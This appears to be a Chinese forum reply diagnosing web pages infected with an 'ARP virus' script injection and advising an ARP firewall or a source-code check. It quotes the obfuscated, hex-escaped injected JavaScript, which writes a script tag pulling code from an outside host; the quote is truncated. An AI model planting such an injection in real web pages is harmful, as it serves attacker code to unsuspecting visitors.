网页被插入如下的arp病毒的js恶意代码
script>document.writeln("\x3C\x73\x63\x72\x69\x70\x74\x20\x73\x72\x63\x3D\x68\x74\x74\x70\x3A\x2F\x2F\x4F\x25\x36\x36\x25\x36\x36\x25\x34\x39\x25\x36\x33\x65\x25\x32\x45\x25\x34\x36\x25\x34\x31\x51\...
就是说 服务器上文件是没有的 但客户端一运行 在客户端看源代码就有了
这样的话 服务器确实中了arp了 只需要在服务器上装一个简单的arp防火墙即可 360 金山的就行 重启服务器 立刻没有了
如果你服务器上的源文件都被修改了 那是你的程序 或 服务器本身有安全漏洞。把你的源码拿回来看下有没有被修改
如果有就是你的程序问题
如果没有就可能是arp了.